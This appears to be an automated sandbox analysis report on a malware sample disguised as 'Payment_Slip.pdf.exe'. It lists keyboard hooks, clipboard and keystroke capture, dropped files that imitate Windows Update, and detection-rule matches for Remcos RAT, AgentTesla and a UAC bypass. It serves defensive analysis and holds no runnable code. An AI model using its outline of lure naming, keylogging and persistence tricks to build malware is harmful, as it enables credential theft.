Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\Payment_Slip.pdf.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\host.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\host.exe
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\conserver.exe
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\mykksg\mykksg.exe
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\mykksg\mykksg.exe

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe

Code function: 11_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,

11_2_0040A65A

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	11_2_00414EC1
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	14_2_0040987A
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	14_2_004098E2
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 15_2_00406B9A EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	15_2_00406B9A
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 15_2_00406C3D EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	15_2_00406C3D
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 16_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	16_2_004068B5
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 16_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	16_2_004072B5
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	17_2_00414EC1

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe

Code function: 11_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,

11_2_0040A65A

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe

Code function: 11_2_00409468 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,

11_2_00409468

Source: C:\Users\user\AppData\Roaming\host.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Window created: window name: CLIPBRDWNDCLASS

Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_06C3D1C0 GetKeyState,GetKeyState,GetKeyState,		12_2_06C3D1C0
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_06C3D1D0 GetKeyState,GetKeyState,GetKeyState,		12_2_06C3D1D0

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.mHTmhPhJy.exe.416f180.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1205028524.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3614974815.0000000002ECF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3614283187.00000000013DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1224623594.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.1223302187.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1251111243.000000000416F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1224421328.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3611370738.0000000001330000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Payment_Slip.pdf.exe PID: 8060, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Payment_Slip.pdf.exe PID: 7544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mHTmhPhJy.exe PID: 7856, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mHTmhPhJy.exe PID: 5392, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dwn.exe PID: 7300, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_0041A76C SystemParametersInfoW,		11_2_0041A76C
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_0041A76C SystemParametersInfoW,		17_2_0041A76C

System Summary

Malicious sample detected (through community Yara rule)

Source: 13.0.conserver.exe.d70000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 13.0.conserver.exe.d70000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 7.2.mHTmhPhJy.exe.416f180.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 7.2.mHTmhPhJy.exe.416f180.4.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000000.1223302187.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000D.00000000.1218959335.0000000000D72000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000007.00000002.1251111243.000000000416F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000011.00000002.1224421328.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: Payment_Slip.pdf.exe PID: 8060, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: mHTmhPhJy.exe PID: 7856, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: mHTmhPhJy.exe PID: 5392, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: conserver.exe PID: 8164, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: dwn.exe PID: 7300, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\conserver.exe, type: DROPPED	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: C:\Users\user\AppData\Local\Temp\conserver.exe, type: DROPPED	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe, type: DROPPED	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe, type: DROPPED	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED	Matched rule: REMCOS_RAT_variants Author: unknown
Source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample	Static PE information: Filename: Payment_Slip.pdf.exe
Source: initial sample	Static PE information: Filename: Payment_Slip.pdf.exe

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,	14_2_0040DD85
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_00401806 NtdllDefWindowProc_W,	14_2_00401806
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_004018C0 NtdllDefWindowProc_W,	14_2_004018C0
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 15_2_004016FC NtdllDefWindowProc_A,	15_2_004016FC
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 15_2_004017B6 NtdllDefWindowProc_A,	15_2_004017B6
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 16_2_00402CAC NtdllDefWindowProc_A,	16_2_00402CAC
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 16_2_00402D66 NtdllDefWindowProc_A,	16_2_00402D66

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress,		11_2_00414DB4
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress,		17_2_00414DB4

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 0_2_00A34210	0_2_00A34210
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 0_2_00A3E1AC	0_2_00A3E1AC
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 0_2_00A36F90	0_2_00A36F90
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 0_2_09617D50	0_2_09617D50
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 0_2_09619308	0_2_09619308
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 0_2_096139C8	0_2_096139C8
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 0_2_09611D50	0_2_09611D50
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 0_2_09612188	0_2_09612188
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 0_2_09614378	0_2_09614378
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 0_2_096125C0	0_2_096125C0
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 7_2_02F34210	7_2_02F34210
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 7_2_02F3E1AC	7_2_02F3E1AC
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 7_2_02F36F90	7_2_02F36F90
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 7_2_076D6EE0	7_2_076D6EE0
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 7_2_076D8498	7_2_076D8498
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 7_2_076D1D50	7_2_076D1D50
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 7_2_076D25C0	7_2_076D25C0
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 7_2_076D4378	7_2_076D4378
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 7_2_076D39C8	7_2_076D39C8
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 7_2_076D2188	7_2_076D2188
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_00425152	11_2_00425152
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_00435286	11_2_00435286
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_004513D4	11_2_004513D4
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_0045050B	11_2_0045050B
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_00436510	11_2_00436510
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_004316FB	11_2_004316FB
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_0043569E	11_2_0043569E
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_00443700	11_2_00443700
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_004257FB	11_2_004257FB
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_004128E3	11_2_004128E3
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_00425964	11_2_00425964
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_0041B917	11_2_0041B917
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_0043D9CC	11_2_0043D9CC
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_00435AD3	11_2_00435AD3
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_00424BC3	11_2_00424BC3
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_0043DBFB	11_2_0043DBFB
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_0044ABA9	11_2_0044ABA9
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_00433C0B	11_2_00433C0B
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_00434D8A	11_2_00434D8A
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_0043DE2A	11_2_0043DE2A
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_0041CEAF	11_2_0041CEAF
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_00435F08	11_2_00435F08
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_007D3170	12_2_007D3170
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_007D316B	12_2_007D316B
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_00C94228	12_2_00C94228
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_00C94570	12_2_00C94570
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_00C94E40	12_2_00C94E40
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_00C9930C	12_2_00C9930C
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_00C9AA80	12_2_00C9AA80
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_00C9AA71	12_2_00C9AA71
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_00C9931D	12_2_00C9931D
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_00C9B770	12_2_00C9B770
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_067F6C63	12_2_067F6C63
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_067FC961	12_2_067FC961
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_0683B740	12_2_0683B740
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_0683C418	12_2_0683C418
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_068353B0	12_2_068353B0
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_0683D8E0	12_2_0683D8E0
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_0683D00B	12_2_0683D00B
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_0683F1F8	12_2_0683F1F8
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_068322F8	12_2_068322F8
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_06C3245B	12_2_06C3245B
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_06C33428	12_2_06C33428
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_06C37AC3	12_2_06C37AC3
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_06C359F0	12_2_06C359F0
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Code function: 13_2_02E3A1A0	13_2_02E3A1A0
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Code function: 13_2_02E39588	13_2_02E39588
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Code function: 13_2_02E398D0	13_2_02E398D0
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Code function: 13_2_05B22DA0	13_2_05B22DA0
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Code function: 13_2_05B233D8	13_2_05B233D8
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Code function: 13_2_05B23B10	13_2_05B23B10
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Code function: 13_2_0682F200	13_2_0682F200
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Code function: 13_2_06820713	13_2_06820713
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Code function: 13_2_0682C4E0	13_2_0682C4E0
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Code function: 13_2_06826510	13_2_06826510
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Code function: 13_2_0682C393	13_2_0682C393
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Code function: 13_2_06827773	13_2_06827773
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Code function: 13_2_06827778	13_2_06827778
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Code function: 13_2_0682D378	13_2_0682D378
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Code function: 13_2_06A9D690	13_2_06A9D690
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Code function: 13_2_06A93668	13_2_06A93668
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Code function: 13_2_06A9E648	13_2_06A9E648
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Code function: 13_2_06A970E8	13_2_06A970E8
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Code function: 13_2_06A9B184	13_2_06A9B184
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Code function: 13_2_06A9E620	13_2_06A9E620
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Code function: 13_2_06A90B90	13_2_06A90B90
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Code function: 13_2_06A9F330	13_2_06A9F330
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Code function: 13_2_06A9D1E2	13_2_06A9D1E2
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_0044B040	14_2_0044B040
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_0043610D	14_2_0043610D
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_00447310	14_2_00447310
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_0044A490	14_2_0044A490
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_0040755A	14_2_0040755A
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_0043C560	14_2_0043C560
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_0044B610	14_2_0044B610
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_0044D6C0	14_2_0044D6C0
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_004476F0	14_2_004476F0
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_0044B870	14_2_0044B870
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_0044081D	14_2_0044081D
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_00414957	14_2_00414957
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_004079EE	14_2_004079EE
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_00407AEB	14_2_00407AEB
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_0044AA80	14_2_0044AA80
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_00412AA9	14_2_00412AA9
